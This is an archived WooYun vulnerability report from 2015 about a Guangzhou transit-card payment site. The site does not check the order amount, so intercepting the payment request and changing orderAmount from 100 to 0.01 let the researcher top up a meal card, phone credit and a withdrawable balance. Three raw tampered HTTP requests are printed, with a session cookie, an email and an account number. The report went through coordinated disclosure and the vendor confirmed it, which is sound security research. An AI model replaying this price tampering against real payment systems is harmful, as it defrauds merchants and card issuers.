当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136459

漏洞标题:广州某一卡通中心一分钱充饭卡充话费等业务且可无限额提现(测试成功)

相关厂商:广州某一卡通中心

漏洞作者: hyge

提交时间:2015-08-24 16:45

修复时间:2015-10-11 17:14

公开时间:2015-10-11 17:14

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-27: 厂商已经确认,细节仅向厂商公开
2015-09-06: 细节向核心白帽子及相关领域专家公开
2015-09-16: 细节向普通白帽子公开
2015-09-26: 细节向实习白帽子公开
2015-10-11: 细节向公众公开

简要描述:

打开衣橱,发现无衣可穿,尴尬的笑,幸亏身材尚好,混搭也可。

详细说明:

点开支付宝,发现无余额可充值,尴尬的笑,幸亏技术够diao,一分充值也可。
通过检测发现,在订单实时付款功能存在严重的业务漏洞,实时付款时订单金额在请求第三方支付接口(如支付宝)支付时未设置有效的金额防篡改机制,导致攻击者在请求第三方支付接口时订单金额可被任意篡改,如100元业务金额在请求第三方支付接口时可改成0.01元进行支付。并且在第三方支付完成了实际支付后也存在严重的业务问题,电商订单系统只认证其是否支付成功,没有再次校验实际支付金额就返回支付成功。攻击者可通过该漏洞在订单支付时,可用0.01元办任何有需要支付的业务,甚至可存在攻击者利用这一漏洞,在支付成功后可通过提现流程进行恶意套现。
昨晚看到食堂的饭菜不和胃口,点了10元的葱油拌面,刷卡时发现余额不足,掏出荷包,已是囊中羞涩,找同学借了饭卡刷了吃完回来就充卡,我怕下次找不到人借卡就尴尬。出去吃饭的时候Fiddler没关,结果。。
下面详细说明
一卡通充值:
提交卡号、姓名、金额

1.png


生成订单

2.png


就在付款的一瞬间,我截取了数据包

POST https://www.gzekt.com/payServlet HTTP/1.1
Host: www.gzekt.com
Connection: keep-alive
Content-Length: 143
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.gzekt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2369.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://www.gzekt.com/PayAction_payOrder.action?orderids=20150824100011000005
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=DE67C1DE857AF90701A0411E026AC4EF; username=gehuiyun407%40163.com; checked=checked
orderNumber=20150824100011000005&busicode=100011&orderAmount=100.0&payusername=gehuiyun407%40163.com&payaccno=100101303558&iAccType=4&payType=3


轻轻的我就把orderAmount=100.0改为了0.01
千山万水总是情,我给你一分行不行

4.png


好像行

5.png


还真行

6.png


大学城一卡通充值完后,还得到补助领取机去圈存领取。后来我领取成功了。。
手机话费充值:
提交手机号和面额

图片1.png


生成订单

2.png


我轻轻地把数据包拦、

POST https://www.gzekt.com/payServlet HTTP/1.1
Host: www.gzekt.com
Connection: keep-alive
Content-Length: 142
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.gzekt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2369.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://www.gzekt.com/PayAction_updateOrderCust.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=DE67C1DE857AF90701A0411E026AC4EF; username=gehuiyun407%40163.com; checked=checked
orderNumber=20150824100027000005&busicode=100027&orderAmount=98.0&payusername=gehuiyun407%40163.com&payaccno=100101303558&iAccType=4&payType=3


轻轻的修改了它的价格。
千山万水总是情。。。

图片3.png


行。。

图片4.png


哇哦。。。又成功了。

图片5.png


没有短信提醒。我打电话给坑爹的移动大婶。。账户确实多了100...
我的汇银通 充值 这个充值后可提现
同样的道理。。。
提交充值金额

图片6.png


生成订单

图片7.png


我轻轻地轻轻地。。。

POST https://www.gzekt.com/payServlet HTTP/1.1
Host: www.gzekt.com
Connection: keep-alive
Content-Length: 143
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.gzekt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2369.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://www.gzekt.com/PayAction_payOrder.action?orderids=20150824100001000014
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=DE67C1DE857AF90701A0411E026AC4EF; username=gehuiyun407%40163.com; checked=checked
orderNumber=20150824100001000014&busicode=100001&orderAmount=100.0&payusername=gehuiyun407%40163.com&payaccno=100101303558&iAccType=1&payType=3


轻轻的修改了它的价格
千山万水总是情、、、

图片8.png


有木有。

图片9.png


有了。

图片10.png


完了之后,还有个提现功能,没有绑定银行卡,我就不去弄了。。。。
左侧栏的各种服务,都可以一分钱服务。看到驾校报名,可惜我拿到本本好几年。。。

图片11.png


图片12.png

漏洞证明:

就这样,不多说了。
还要什么漏洞证明。
没有经过安全评估就上线运营。
太多漏洞了、这个算是最最严重的、严重的影响了资金安全、、
日子本就过得拮据,学费还没凑到、我怕我心生邪念,也为了防止被土不人利用了此漏洞。我就罪过大了。赶紧把漏洞交给国家。。

修复方案:

修复这么简单,还要我说么。。。

版权声明:转载请注明来源 hyge@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-27 17:13

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:15
正在联系相关网站管理单位处置。

最新状态:

暂无